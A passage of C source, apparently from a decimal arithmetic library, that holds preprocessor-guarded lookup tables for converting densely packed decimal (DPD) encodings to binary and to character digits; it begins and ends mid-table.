42000, 43000, 44000, 45000, 46000, 47000, 48000, 49000, 84000, 85000, 840000, 841000, 88000, 89000, 50000, 51000, 52000, 53000, 54000, 55000, 56000, 57000, 58000, 59000, 94000, 95000, 850000, 851000, 98000, 99000, 60000, 61000, 62000, 63000, 64000, 65000, 66000, 67000, 68000, 69000, 86000, 87000, 860000, 861000, 888000, 889000, 70000, 71000, 72000, 73000, 74000, 75000, 76000, 77000, 78000, 79000, 96000, 97000, 870000, 871000, 898000, 899000, 100000, 101000, 102000, 103000, 104000, 105000, 106000, 107000, 108000, 109000, 180000, 181000, 900000, 901000, 980000, 981000, 110000, 111000, 112000, 113000, 114000, 115000, 116000, 117000, 118000, 119000, 190000, 191000, 910000, 911000, 990000, 991000, 120000, 121000, 122000, 123000, 124000, 125000, 126000, 127000, 128000, 129000, 182000, 183000, 920000, 921000, 908000, 909000, 130000, 131000, 132000, 133000, 134000, 135000, 136000, 137000, 138000, 139000, 192000, 193000, 930000, 931000, 918000, 919000, 140000, 141000, 142000, 143000, 144000, 145000, 146000, 147000, 148000, 149000, 184000, 185000, 940000, 941000, 188000, 189000, 150000, 151000, 152000, 153000, 154000, 155000, 156000, 157000, 158000, 159000, 194000, 195000, 950000, 951000, 198000, 199000, 160000, 161000, 162000, 163000, 164000, 165000, 166000, 167000, 168000, 169000, 186000, 187000, 960000, 961000, 988000, 989000, 170000, 171000, 172000, 173000, 174000, 175000, 176000, 177000, 178000, 179000, 196000, 197000, 970000, 971000, 998000, 999000, 200000, 201000, 202000, 203000, 204000, 205000, 206000, 207000, 208000, 209000, 280000, 281000, 802000, 803000, 882000, 883000, 210000, 211000, 212000, 213000, 214000, 215000, 216000, 217000, 218000, 219000, 290000, 291000, 812000, 813000, 892000, 893000, 220000, 221000, 222000, 223000, 224000, 225000, 226000, 227000, 228000, 229000, 282000, 283000, 822000, 823000, 828000, 829000, 230000, 231000, 232000, 233000, 234000, 235000, 236000, 237000, 238000, 239000, 292000, 293000, 832000, 833000, 838000, 839000, 240000, 241000, 242000, 243000, 244000, 245000, 246000, 247000, 248000, 249000, 284000, 285000, 842000, 843000, 288000, 289000, 250000, 251000, 252000, 253000, 254000, 255000, 256000, 257000, 258000, 259000, 294000, 295000, 852000, 853000, 298000, 299000, 260000, 261000, 262000, 263000, 264000, 265000, 266000, 267000, 268000, 269000, 286000, 287000, 862000, 863000, 888000, 889000, 270000, 271000, 272000, 273000, 274000, 275000, 276000, 277000, 278000, 279000, 296000, 297000, 872000, 873000, 898000, 899000, 300000, 301000, 302000, 303000, 304000, 305000, 306000, 307000, 308000, 309000, 380000, 381000, 902000, 903000, 982000, 983000, 310000, 311000, 312000, 313000, 314000, 315000, 316000, 317000, 318000, 319000, 390000, 391000, 912000, 913000, 992000, 993000, 320000, 321000, 322000, 323000, 324000, 325000, 326000, 327000, 328000, 329000, 382000, 383000, 922000, 923000, 928000, 929000, 330000, 331000, 332000, 333000, 334000, 335000, 336000, 337000, 338000, 339000, 392000, 393000, 932000, 933000, 938000, 939000, 340000, 341000, 342000, 343000, 344000, 345000, 346000, 347000, 348000, 349000, 384000, 385000, 942000, 943000, 388000, 389000, 350000, 351000, 352000, 353000, 354000, 355000, 356000, 357000, 358000, 359000, 394000, 395000, 952000, 953000, 398000, 399000, 360000, 361000, 362000, 363000, 364000, 365000, 366000, 367000, 368000, 369000, 386000, 387000, 962000, 963000, 988000, 989000, 370000, 371000, 372000, 373000, 374000, 375000, 376000, 377000, 378000, 379000, 396000, 397000, 972000, 973000, 998000, 999000, 400000, 401000, 402000, 403000, 404000, 405000, 406000, 407000, 408000, 409000, 480000, 481000, 804000, 805000, 884000, 885000, 410000, 411000, 412000, 413000, 414000, 415000, 416000, 417000, 418000, 419000, 490000, 491000, 814000, 815000, 894000, 895000, 420000, 421000, 422000, 423000, 424000, 425000, 426000, 427000, 428000, 429000, 482000, 483000, 824000, 825000, 848000, 849000, 430000, 431000, 432000, 433000, 434000, 435000, 436000, 437000, 438000, 439000, 492000, 493000, 834000, 835000, 858000, 859000, 440000, 441000, 442000, 443000, 444000, 445000, 446000, 447000, 448000, 449000, 484000, 485000, 844000, 845000, 488000, 489000, 450000, 451000, 452000, 453000, 454000, 455000, 456000, 457000, 458000, 459000, 494000, 495000, 854000, 855000, 498000, 499000, 460000, 461000, 462000, 463000, 464000, 465000, 466000, 467000, 468000, 469000, 486000, 487000, 864000, 865000, 888000, 889000, 470000, 471000, 472000, 473000, 474000, 475000, 476000, 477000, 478000, 479000, 496000, 497000, 874000, 875000, 898000, 899000, 500000, 501000, 502000, 503000, 504000, 505000, 506000, 507000, 508000, 509000, 580000, 581000, 904000, 905000, 984000, 985000, 510000, 511000, 512000, 513000, 514000, 515000, 516000, 517000, 518000, 519000, 590000, 591000, 914000, 915000, 994000, 995000, 520000, 521000, 522000, 523000, 524000, 525000, 526000, 527000, 528000, 529000, 582000, 583000, 924000, 925000, 948000, 949000, 530000, 531000, 532000, 533000, 534000, 535000, 536000, 537000, 538000, 539000, 592000, 593000, 934000, 935000, 958000, 959000, 540000, 541000, 542000, 543000, 544000, 545000, 546000, 547000, 548000, 549000, 584000, 585000, 944000, 945000, 588000, 589000, 550000, 551000, 552000, 553000, 554000, 555000, 556000, 557000, 558000, 559000, 594000, 595000, 954000, 955000, 598000, 599000, 560000, 561000, 562000, 563000, 564000, 565000, 566000, 567000, 568000, 569000, 586000, 587000, 964000, 965000, 988000, 989000, 570000, 571000, 572000, 573000, 574000, 575000, 576000, 577000, 578000, 579000, 596000, 597000, 974000, 975000, 998000, 999000, 600000, 601000, 602000, 603000, 604000, 605000, 606000, 607000, 608000, 609000, 680000, 681000, 806000, 807000, 886000, 887000, 610000, 611000, 612000, 613000, 614000, 615000, 616000, 617000, 618000, 619000, 690000, 691000, 816000, 817000, 896000, 897000, 620000, 621000, 622000, 623000, 624000, 625000, 626000, 627000, 628000, 629000, 682000, 683000, 826000, 827000, 868000, 869000, 630000, 631000, 632000, 633000, 634000, 635000, 636000, 637000, 638000, 639000, 692000, 693000, 836000, 837000, 878000, 879000, 640000, 641000, 642000, 643000, 644000, 645000, 646000, 647000, 648000, 649000, 684000, 685000, 846000, 847000, 688000, 689000, 650000, 651000, 652000, 653000, 654000, 655000, 656000, 657000, 658000, 659000, 694000, 695000, 856000, 857000, 698000, 699000, 660000, 661000, 662000, 663000, 664000, 665000, 666000, 667000, 668000, 669000, 686000, 687000, 866000, 867000, 888000, 889000, 670000, 671000, 672000, 673000, 674000, 675000, 676000, 677000, 678000, 679000, 696000, 697000, 876000, 877000, 898000, 899000, 700000, 701000, 702000, 703000, 704000, 705000, 706000, 707000, 708000, 709000, 780000, 781000, 906000, 907000, 986000, 987000, 710000, 711000, 712000, 713000, 714000, 715000, 716000, 717000, 718000, 719000, 790000, 791000, 916000, 917000, 996000, 997000, 720000, 721000, 722000, 723000, 724000, 725000, 726000, 727000, 728000, 729000, 782000, 783000, 926000, 927000, 968000, 969000, 730000, 731000, 732000, 733000, 734000, 735000, 736000, 737000, 738000, 739000, 792000, 793000, 936000, 937000, 978000, 979000, 740000, 741000, 742000, 743000, 744000, 745000, 746000, 747000, 748000, 749000, 784000, 785000, 946000, 947000, 788000, 789000, 750000, 751000, 752000, 753000, 754000, 755000, 756000, 757000, 758000, 759000, 794000, 795000, 956000, 957000, 798000, 799000, 760000, 761000, 762000, 763000, 764000, 765000, 766000, 767000, 768000, 769000, 786000, 787000, 966000, 967000, 988000, 989000, 770000, 771000, 772000, 773000, 774000, 775000, 776000, 777000, 778000, 779000, 796000, 797000, 976000, 977000, 998000, 999000}; #endif #if defined(DEC_DPD2BINM) && DEC_DPD2BINM==1 && !defined(DECDPD2BINM) #define DECDPD2BINM const uint32_t DPD2BINM[1024]={0, 1000000, 2000000, 3000000, 4000000, 5000000, 6000000, 7000000, 8000000, 9000000, 80000000, 81000000, 800000000, 801000000, 880000000, 881000000, 10000000, 11000000, 12000000, 13000000, 14000000, 15000000, 16000000, 17000000, 18000000, 19000000, 90000000, 91000000, 810000000, 811000000, 890000000, 891000000, 20000000, 21000000, 22000000, 23000000, 24000000, 25000000, 26000000, 27000000, 28000000, 29000000, 82000000, 83000000, 820000000, 821000000, 808000000, 809000000, 30000000, 31000000, 32000000, 33000000, 34000000, 35000000, 36000000, 37000000, 38000000, 39000000, 92000000, 93000000, 830000000, 831000000, 818000000, 819000000, 40000000, 41000000, 42000000, 43000000, 44000000, 45000000, 46000000, 47000000, 48000000, 49000000, 84000000, 85000000, 840000000, 841000000, 88000000, 89000000, 50000000, 51000000, 52000000, 53000000, 54000000, 55000000, 56000000, 57000000, 58000000, 59000000, 94000000, 95000000, 850000000, 851000000, 98000000, 99000000, 60000000, 61000000, 62000000, 63000000, 64000000, 65000000, 66000000, 67000000, 68000000, 69000000, 86000000, 87000000, 860000000, 861000000, 888000000, 889000000, 70000000, 71000000, 72000000, 73000000, 74000000, 75000000, 76000000, 77000000, 78000000, 79000000, 96000000, 97000000, 870000000, 871000000, 898000000, 899000000, 100000000, 101000000, 102000000, 103000000, 104000000, 105000000, 106000000, 107000000, 108000000, 109000000, 180000000, 181000000, 900000000, 901000000, 980000000, 981000000, 110000000, 111000000, 112000000, 113000000, 114000000, 115000000, 116000000, 117000000, 118000000, 119000000, 190000000, 191000000, 910000000, 911000000, 990000000, 991000000, 120000000, 121000000, 122000000, 123000000, 124000000, 125000000, 126000000, 127000000, 128000000, 129000000, 182000000, 183000000, 920000000, 921000000, 908000000, 909000000, 130000000, 131000000, 132000000, 133000000, 134000000, 135000000, 136000000, 137000000, 138000000, 139000000, 192000000, 193000000, 930000000, 931000000, 918000000, 919000000, 140000000, 141000000, 142000000, 143000000, 144000000, 145000000, 146000000, 147000000, 148000000, 149000000, 184000000, 185000000, 940000000, 941000000, 188000000, 189000000, 150000000, 151000000, 152000000, 153000000, 154000000, 155000000, 156000000, 157000000, 158000000, 159000000, 194000000, 195000000, 950000000, 951000000, 198000000, 199000000, 160000000, 161000000, 162000000, 163000000, 164000000, 165000000, 166000000, 167000000, 168000000, 169000000, 186000000, 187000000, 960000000, 961000000, 988000000, 989000000, 170000000, 171000000, 172000000, 173000000, 174000000, 175000000, 176000000, 177000000, 178000000, 179000000, 196000000, 197000000, 970000000, 971000000, 998000000, 999000000, 200000000, 201000000, 202000000, 203000000, 204000000, 205000000, 206000000, 207000000, 208000000, 209000000, 280000000, 281000000, 802000000, 803000000, 882000000, 883000000, 210000000, 211000000, 212000000, 213000000, 214000000, 215000000, 216000000, 217000000, 218000000, 219000000, 290000000, 291000000, 812000000, 813000000, 892000000, 893000000, 220000000, 221000000, 222000000, 223000000, 224000000, 225000000, 226000000, 227000000, 228000000, 229000000, 282000000, 283000000, 822000000, 823000000, 828000000, 829000000, 230000000, 231000000, 232000000, 233000000, 234000000, 235000000, 236000000, 237000000, 238000000, 239000000, 292000000, 293000000, 832000000, 833000000, 838000000, 839000000, 240000000, 241000000, 242000000, 243000000, 244000000, 245000000, 246000000, 247000000, 248000000, 249000000, 284000000, 285000000, 842000000, 843000000, 288000000, 289000000, 250000000, 251000000, 252000000, 253000000, 254000000, 255000000, 256000000, 257000000, 258000000, 259000000, 294000000, 295000000, 852000000, 853000000, 298000000, 299000000, 260000000, 261000000, 262000000, 263000000, 264000000, 265000000, 266000000, 267000000, 268000000, 269000000, 286000000, 287000000, 862000000, 863000000, 888000000, 889000000, 270000000, 271000000, 272000000, 273000000, 274000000, 275000000, 276000000, 277000000, 278000000, 279000000, 296000000, 297000000, 872000000, 873000000, 898000000, 899000000, 300000000, 301000000, 302000000, 303000000, 304000000, 305000000, 306000000, 307000000, 308000000, 309000000, 380000000, 381000000, 902000000, 903000000, 982000000, 983000000, 310000000, 311000000, 312000000, 313000000, 314000000, 315000000, 316000000, 317000000, 318000000, 319000000, 390000000, 391000000, 912000000, 913000000, 992000000, 993000000, 320000000, 321000000, 322000000, 323000000, 324000000, 325000000, 326000000, 327000000, 328000000, 329000000, 382000000, 383000000, 922000000, 923000000, 928000000, 929000000, 330000000, 331000000, 332000000, 333000000, 334000000, 335000000, 336000000, 337000000, 338000000, 339000000, 392000000, 393000000, 932000000, 933000000, 938000000, 939000000, 340000000, 341000000, 342000000, 343000000, 344000000, 345000000, 346000000, 347000000, 348000000, 349000000, 384000000, 385000000, 942000000, 943000000, 388000000, 389000000, 350000000, 351000000, 352000000, 353000000, 354000000, 355000000, 356000000, 357000000, 358000000, 359000000, 394000000, 395000000, 952000000, 953000000, 398000000, 399000000, 360000000, 361000000, 362000000, 363000000, 364000000, 365000000, 366000000, 367000000, 368000000, 369000000, 386000000, 387000000, 962000000, 963000000, 988000000, 989000000, 370000000, 371000000, 372000000, 373000000, 374000000, 375000000, 376000000, 377000000, 378000000, 379000000, 396000000, 397000000, 972000000, 973000000, 998000000, 999000000, 400000000, 401000000, 402000000, 403000000, 404000000, 405000000, 406000000, 407000000, 408000000, 409000000, 480000000, 481000000, 804000000, 805000000, 884000000, 885000000, 410000000, 411000000, 412000000, 413000000, 414000000, 415000000, 416000000, 417000000, 418000000, 419000000, 490000000, 491000000, 814000000, 815000000, 894000000, 895000000, 420000000, 421000000, 422000000, 423000000, 424000000, 425000000, 426000000, 427000000, 428000000, 429000000, 482000000, 483000000, 824000000, 825000000, 848000000, 849000000, 430000000, 431000000, 432000000, 433000000, 434000000, 435000000, 436000000, 437000000, 438000000, 439000000, 492000000, 493000000, 834000000, 835000000, 858000000, 859000000, 440000000, 441000000, 442000000, 443000000, 444000000, 445000000, 446000000, 447000000, 448000000, 449000000, 484000000, 485000000, 844000000, 845000000, 488000000, 489000000, 450000000, 451000000, 452000000, 453000000, 454000000, 455000000, 456000000, 457000000, 458000000, 459000000, 494000000, 495000000, 854000000, 855000000, 498000000, 499000000, 460000000, 461000000, 462000000, 463000000, 464000000, 465000000, 466000000, 467000000, 468000000, 469000000, 486000000, 487000000, 864000000, 865000000, 888000000, 889000000, 470000000, 471000000, 472000000, 473000000, 474000000, 475000000, 476000000, 477000000, 478000000, 479000000, 496000000, 497000000, 874000000, 875000000, 898000000, 899000000, 500000000, 501000000, 502000000, 503000000, 504000000, 505000000, 506000000, 507000000, 508000000, 509000000, 580000000, 581000000, 904000000, 905000000, 984000000, 985000000, 510000000, 511000000, 512000000, 513000000, 514000000, 515000000, 516000000, 517000000, 518000000, 519000000, 590000000, 591000000, 914000000, 915000000, 994000000, 995000000, 520000000, 521000000, 522000000, 523000000, 524000000, 525000000, 526000000, 527000000, 528000000, 529000000, 582000000, 583000000, 924000000, 925000000, 948000000, 949000000, 530000000, 531000000, 532000000, 533000000, 534000000, 535000000, 536000000, 537000000, 538000000, 539000000, 592000000, 593000000, 934000000, 935000000, 958000000, 959000000, 540000000, 541000000, 542000000, 543000000, 544000000, 545000000, 546000000, 547000000, 548000000, 549000000, 584000000, 585000000, 944000000, 945000000, 588000000, 589000000, 550000000, 551000000, 552000000, 553000000, 554000000, 555000000, 556000000, 557000000, 558000000, 559000000, 594000000, 595000000, 954000000, 955000000, 598000000, 599000000, 560000000, 561000000, 562000000, 563000000, 564000000, 565000000, 566000000, 567000000, 568000000, 569000000, 586000000, 587000000, 964000000, 965000000, 988000000, 989000000, 570000000, 571000000, 572000000, 573000000, 574000000, 575000000, 576000000, 577000000, 578000000, 579000000, 596000000, 597000000, 974000000, 975000000, 998000000, 999000000, 600000000, 601000000, 602000000, 603000000, 604000000, 605000000, 606000000, 607000000, 608000000, 609000000, 680000000, 681000000, 806000000, 807000000, 886000000, 887000000, 610000000, 611000000, 612000000, 613000000, 614000000, 615000000, 616000000, 617000000, 618000000, 619000000, 690000000, 691000000, 816000000, 817000000, 896000000, 897000000, 620000000, 621000000, 622000000, 623000000, 624000000, 625000000, 626000000, 627000000, 628000000, 629000000, 682000000, 683000000, 826000000, 827000000, 868000000, 869000000, 630000000, 631000000, 632000000, 633000000, 634000000, 635000000, 636000000, 637000000, 638000000, 639000000, 692000000, 693000000, 836000000, 837000000, 878000000, 879000000, 640000000, 641000000, 642000000, 643000000, 644000000, 645000000, 646000000, 647000000, 648000000, 649000000, 684000000, 685000000, 846000000, 847000000, 688000000, 689000000, 650000000, 651000000, 652000000, 653000000, 654000000, 655000000, 656000000, 657000000, 658000000, 659000000, 694000000, 695000000, 856000000, 857000000, 698000000, 699000000, 660000000, 661000000, 662000000, 663000000, 664000000, 665000000, 666000000, 667000000, 668000000, 669000000, 686000000, 687000000, 866000000, 867000000, 888000000, 889000000, 670000000, 671000000, 672000000, 673000000, 674000000, 675000000, 676000000, 677000000, 678000000, 679000000, 696000000, 697000000, 876000000, 877000000, 898000000, 899000000, 700000000, 701000000, 702000000, 703000000, 704000000, 705000000, 706000000, 707000000, 708000000, 709000000, 780000000, 781000000, 906000000, 907000000, 986000000, 987000000, 710000000, 711000000, 712000000, 713000000, 714000000, 715000000, 716000000, 717000000, 718000000, 719000000, 790000000, 791000000, 916000000, 917000000, 996000000, 997000000, 720000000, 721000000, 722000000, 723000000, 724000000, 725000000, 726000000, 727000000, 728000000, 729000000, 782000000, 783000000, 926000000, 927000000, 968000000, 969000000, 730000000, 731000000, 732000000, 733000000, 734000000, 735000000, 736000000, 737000000, 738000000, 739000000, 792000000, 793000000, 936000000, 937000000, 978000000, 979000000, 740000000, 741000000, 742000000, 743000000, 744000000, 745000000, 746000000, 747000000, 748000000, 749000000, 784000000, 785000000, 946000000, 947000000, 788000000, 789000000, 750000000, 751000000, 752000000, 753000000, 754000000, 755000000, 756000000, 757000000, 758000000, 759000000, 794000000, 795000000, 956000000, 957000000, 798000000, 799000000, 760000000, 761000000, 762000000, 763000000, 764000000, 765000000, 766000000, 767000000, 768000000, 769000000, 786000000, 787000000, 966000000, 967000000, 988000000, 989000000, 770000000, 771000000, 772000000, 773000000, 774000000, 775000000, 776000000, 777000000, 778000000, 779000000, 796000000, 797000000, 976000000, 977000000, 998000000, 999000000}; #endif #if defined(DEC_BIN2CHAR) && DEC_BIN2CHAR==1 && !defined(DECBIN2CHAR) #define DECBIN2CHAR const uint8_t BIN2CHAR[4001]={ '\0','0','0','0', '\1','0','0','1', '\1','0','0','2', '\1','0','0','3', '\1','0','0','4', '\1','0','0','5', '\1','0','0','6', '\1','0','0','7', '\1','0','0','8', '\1','0','0','9', '\2','0','1','0', '\2','0','1','1', '\2','0','1','2', '\2','0','1','3', '\2','0','1','4', '\2','0','1','5', '\2','0','1','6', '\2','0','1','7', '\2','0','1','8', '\2','0','1','9', '\2','0','2','0', '\2','0','2','1', '\2','0','2','2', '\2','0','2','3', '\2','0','2','4', '\2','0','2','5', '\2','0','2','6', '\2','0','2','7', '\2','0','2','8', '\2','0','2','9', '\2','0','3','0', '\2','0','3','1', '\2','0','3','2', '\2','0','3','3', '\2','0','3','4', '\2','0','3','5', '\2','0','3','6', '\2','0','3','7', '\2','0','3','8', '\2','0','3','9', '\2','0','4','0', '\2','0','4','1', '\2','0','4','2', '\2','0','4','3', '\2','0','4','4', '\2','0','4','5', '\2','0','4','6', '\2','0','4','7', '\2','0','4','8', '\2','0','4','9', '\2','0','5','0', '\2','0','5','1', '\2','0','5','2', '\2','0','5','3', '\2','0','5','4', '\2','0','5','5', '\2','0','5','6', '\2','0','5','7', '\2','0','5','8', '\2','0','5','9', '\2','0','6','0', '\2','0','6','1', '\2','0','6','2', '\2','0','6','3', '\2','0','6','4', '\2','0','6','5', '\2','0','6','6', '\2','0','6','7', '\2','0','6','8', '\2','0','6','9', '\2','0','7','0', '\2','0','7','1', '\2','0','7','2', '\2','0','7','3', '\2','0','7','4', '\2','0','7','5', '\2','0','7','6', '\2','0','7','7', '\2','0','7','8', '\2','0','7','9', '\2','0','8','0', '\2','0','8','1', '\2','0','8','2', '\2','0','8','3', '\2','0','8','4', '\2','0','8','5', '\2','0','8','6', '\2','0','8','7', '\2','0','8','8', '\2','0','8','9', '\2','0','9','0', '\2','0','9','1', '\2','0','9','2', '\2','0','9','3', '\2','0','9','4', '\2','0','9','5', '\2','0','9','6', '\2','0','9','7', '\2','0','9','8', '\2','0','9','9', '\3','1','0','0', '\3','1','0','1', '\3','1','0','2', '\3','1','0','3', '\3','1','0','4', '\3','1','0','5', '\3','1','0','6', '\3','1','0','7', '\3','1','0','8', '\3','1','0','9', '\3','1','1','0', '\3','1','1','1', '\3','1','1','2', '\3','1','1','3', '\3','1','1','4', '\3','1','1','5', '\3','1','1','6', '\3','1','1','7', '\3','1','1','8', '\3','1','1','9', '\3','1','2','0', '\3','1','2','1', '\3','1','2','2', '\3','1','2','3', '\3','1','2','4', '\3','1','2','5', '\3','1','2','6', '\3','1','2','7', '\3','1','2','8', '\3','1','2','9', '\3','1','3','0', '\3','1','3','1', '\3','1','3','2', '\3','1','3','3', '\3','1','3','4', '\3','1','3','5', '\3','1','3','6', '\3','1','3','7', '\3','1','3','8', '\3','1','3','9', '\3','1','4','0', '\3','1','4','1', '\3','1','4','2', '\3','1','4','3', '\3','1','4','4', '\3','1','4','5', '\3','1','4','6', '\3','1','4','7', '\3','1','4','8', '\3','1','4','9', '\3','1','5','0', '\3','1','5','1', '\3','1','5','2', '\3','1','5','3', '\3','1','5','4', '\3','1','5','5', '\3','1','5','6', '\3','1','5','7', '\3','1','5','8', '\3','1','5','9', '\3','1','6','0', '\3','1','6','1', '\3','1','6','2', '\3','1','6','3', '\3','1','6','4', '\3','1','6','5', '\3','1','6','6', '\3','1','6','7', '\3','1','6','8', '\3','1','6','9', '\3','1','7','0', '\3','1','7','1', '\3','1','7','2', '\3','1','7','3', '\3','1','7','4', '\3','1','7','5', '\3','1','7','6', '\3','1','7','7', '\3','1','7','8', '\3','1','7','9', '\3','1','8','0', '\3','1','8','1', '\3','1','8','2', '\3','1','8','3', '\3','1','8','4', '\3','1','8','5', '\3','1','8','6', '\3','1','8','7', '\3','1','8','8', '\3','1','8','9', '\3','1','9','0', '\3','1','9','1', '\3','1','9','2', '\3','1','9','3', '\3','1','9','4', '\3','1','9','5', '\3','1','9','6', '\3','1','9','7', '\3','1','9','8', '\3','1','9','9', '\3','2','0','0', '\3','2','0','1', '\3','2','0','2', '\3','2','0','3', '\3','2','0','4', '\3','2','0','5', '\3','2','0','6', '\3','2','0','7', '\3','2','0','8', '\3','2','0','9', '\3','2','1','0', '\3','2','1','1', '\3','2','1','2', '\3','2','1','3', '\3','2','1','4', '\3','2','1','5', '\3','2','1','6', '\3','2','1','7', '\3','2','1','8', '\3','2','1','9', '\3','2','2','0', '\3','2','2','1', '\3','2','2','2', '\3','2','2','3', '\3','2','2','4', '\3','2','2','5', '\3','2','2','6', '\3','2','2','7', '\3','2','2','8', '\3','2','2','9', '\3','2','3','0', '\3','2','3','1', '\3','2','3','2', '\3','2','3','3', '\3','2','3','4', '\3','2','3','5', '\3','2','3','6', '\3','2','3','7', '\3','2','3','8', '\3','2','3','9', '\3','2','4','0', '\3','2','4','1', '\3','2','4','2', '\3','2','4','3', '\3','2','4','4', '\3','2','4','5', '\3','2','4','6', '\3','2','4','7', '\3','2','4','8', '\3','2','4','9', '\3','2','5','0', '\3','2','5','1', '\3','2','5','2', '\3','2','5','3', '\3','2','5','4', '\3','2','5','5', '\3','2','5','6', '\3','2','5','7', '\3','2','5','8', '\3','2','5','9', '\3','2','6','0', '\3','2','6','1', '\3','2','6','2', '\3','2','6','3', '\3','2','6','4', '\3','2','6','5', '\3','2','6','6', '\3','2','6','7', '\3','2','6','8', '\3','2','6','9', '\3','2','7','0', '\3','2','7','1', '\3','2','7','2', '\3','2','7','3', '\3','2','7','4', '\3','2','7','5', '\3','2','7','6', '\3','2','7','7', '\3','2','7','8', '\3','2','7','9', '\3','2','8','0', '\3','2','8','1', '\3','2','8','2', '\3','2','8','3', '\3','2','8','4', '\3','2','8','5', '\3','2','8','6', '\3','2','8','7', '\3','2','8','8', '\3','2','8','9', '\3','2','9','0', '\3','2','9','1', '\3','2','9','2', '\3','2','9','3', '\3','2','9','4', '\3','2','9','5', '\3','2','9','6', '\3','2','9','7', '\3','2','9','8', '\3','2','9','9', '\3','3','0','0', '\3','3','0','1', '\3','3','0','2', '\3','3','0','3', '\3','3','0','4', '\3','3','0','5', '\3','3','0','6', '\3','3','0','7', '\3','3','0','8', '\3','3','0','9', '\3','3','1','0', '\3','3','1','1', '\3','3','1','2', '\3','3','1','3', '\3','3','1','4', '\3','3','1','5', '\3','3','1','6', '\3','3','1','7', '\3','3','1','8', '\3','3','1','9', '\3','3','2','0', '\3','3','2','1', '\3','3','2','2', '\3','3','2','3', '\3','3','2','4', '\3','3','2','5', '\3','3','2','6', '\3','3','2','7', '\3','3','2','8', '\3','3','2','9', '\3','3','3','0', '\3','3','3','1', '\3','3','3','2', '\3','3','3','3', '\3','3','3','4', '\3','3','3','5', '\3','3','3','6', '\3','3','3','7', '\3','3','3','8', '\3','3','3','9', '\3','3','4','0', '\3','3','4','1', '\3','3','4','2', '\3','3','4','3', '\3','3','4','4', '\3','3','4','5', '\3','3','4','6', '\3','3','4','7', '\3','3','4','8', '\3','3','4','9', '\3','3','5','0', '\3','3','5','1', '\3','3','5','2', '\3','3','5','3', '\3','3','5','4', '\3','3','5','5', '\3','3','5','6', '\3','3','5','7', '\3','3','5','8', '\3','3','5','9', '\3','3','6','0', '\3','3','6','1', '\3','3','6','2', '\3','3','6','3', '\3','3','6','4', '\3','3','6','5', '\3','3','6','6', '\3','3','6','7', '\3','3','6','8', '\3','3','6','9', '\3','3','7','0', '\3','3','7','1', '\3','3','7','2', '\3','3','7','3', '\3','3','7','4', '\3','3','7','5', '\3','3','7','6', '\3','3','7','7', '\3','3','7','8', '\3','3','7','9', '\3','3','8','0', '\3','3','8','1', '\3','3','8','2', '\3','3','8','3', '\3','3','8','4', '\3','3','8','5', '\3','3','8','6', '\3','3','8','7', '\3','3','8','8', '\3','3','8','9', '\3','3','9','0', '\3','3','9','1', '\3','3','9','2', '\3','3','9','3', '\3','3','9','4', '\3','3','9','5', '\3','3','9','6', '\3','3','9','7', '\3','3','9','8', '\3','3','9','9', '\3','4','0','0', '\3','4','0','1', '\3','4','0','2', '\3','4','0','3', '\3','4','0','4', '\3','4','0','5', '\3','4','0','6', '\3','4','0','7', '\3','4','0','8', '\3','4','0','9', '\3','4','1','0', '\3','4','1','1', '\3','4','1','2', '\3','4','1','3', '\3','4','1','4', '\3','4','1','5', '\3','4','1','6', '\3','4','1','7', '\3','4','1','8', '\3','4','1','9', '\3','4','2','0', '\3','4','2','1', '\3','4','2','2', '\3','4','2','3', '\3','4','2','4', '\3','4','2','5', '\3','4','2','6', '\3','4','2','7', '\3','4','2','8', '\3','4','2','9', '\3','4','3','0', '\3','4','3','1', '\3','4','3','2', '\3','4','3','3', '\3','4','3','4', '\3','4','3','5', '\3','4','3','6', '\3','4','3','7', '\3','4','3','8', '\3','4','3','9', '\3','4','4','0', '\3','4','4','1', '\3','4','4','2', '\3','4','4','3', '\3','4','4','4', '\3','4','4','5', '\3','4','4','6', '\3','4','4','7', '\3','4','4','8', '\3','4','4','9', '\3','4','5','0', '\3','4','5','1', '\3','4','5','2', '\3','4','5','3', '\3','4','5','4', '\3','4','5','5', '\3','4','5','6', '\3','4','5','7', '\3','4','5','8', '\3','4','5','9', '\3','4','6','0', '\3','4','6','1', '\3','4','6','2', '\3','4','6','3', '\3','4','6','4', '\3','4','6','5', '\3','4','6','6', '\3','4','6','7', '\3','4','6','8', '\3','4','6','9', '\3','4','7','0', '\3','4','7','1', '\3','4','7','2', '\3','4','7','3', '\3','4','7','4', '\3','4','7','5', '\3','4','7','6', '\3','4','7','7', '\3','4','7','8', '\3','4','7','9', '\3','4','8','0', '\3','4','8','1', '\3','4','8','2', '\3','4','8','3', '\3','4','8','4', '\3','4','8','5', '\3','4','8','6', '\3','4','8','7', '\3','4','8','8', '\3','4','8','9', '\3','4','9','0', '\3','4','9','1', '\3','4','9','2', '\3','4','9','3', '\3','4','9','4', '\3','4','9','5', '\3','4','9','6', '\3','4','9','7', '\3','4','9','8', '\3','4','9','9', '\3','5','0','0', '\3','5','0','1', '\3','5','0','2', '\3','5','0','3', '\3','5','0','4', '\3','5','0','5', '\3','5','0','6', '\3','5','0','7', '\3','5','0','8', '\3','5','0','9', '\3','5','1','0', '\3','5','1','1', '\3','5','1','2', '\3','5','1','3', '\3','5','1','4', '\3','5','1','5', '\3','5','1','6', '\3','5','1','7', '\3','5','1','8', '\3','5','1','9', '\3','5','2','0', '\3','5','2','1', '\3','5','2','2', '\3','5','2','3', '\3','5','2','4', '\3','5','2','5', '\3','5','2','6', '\3','5','2','7', '\3','5','2','8', '\3','5','2','9', '\3','5','3','0', '\3','5','3','1', '\3','5','3','2', '\3','5','3','3', '\3','5','3','4', '\3','5','3','5', '\3','5','3','6', '\3','5','3','7', '\3','5','3','8', '\3','5','3','9', '\3','5','4','0', '\3','5','4','1', '\3','5','4','2', '\3','5','4','3', '\3','5','4','4', '\3','5','4','5', '\3','5','4','6', '\3','5','4','7', '\3','5','4','8', '\3','5','4','9', '\3','5','5','0', '\3','5','5','1', '\3','5','5','2', '\3','5','5','3', '\3','5','5','4', '\3','5','5','5', '\3','5','5','6', '\3','5','5','7', '\3','5','5','8', '\3','5','5','9', '\3','5','6','0', '\3','5','6','1', '\3','5','6','2', '\3','5','6','3', '\3','5','6','4', '\3','5','6','5', '\3','5','6','6', '\3','5','6','7', '\3','5','6','8', '\3','5','6','9', '\3','5','7','0', '\3','5','7','1', '\3','5','7','2', '\3','5','7','3', '\3','5','7','4', '\3','5','7','5', '\3','5','7','6', '\3','5','7','7', '\3','5','7','8', '\3','5','7','9', '\3','5','8','0', '\3','5','8','1', '\3','5','8','2', '\3','5','8','3', '\3','5','8','4', '\3','5','8','5', '\3','5','8','6', '\3','5','8','7', 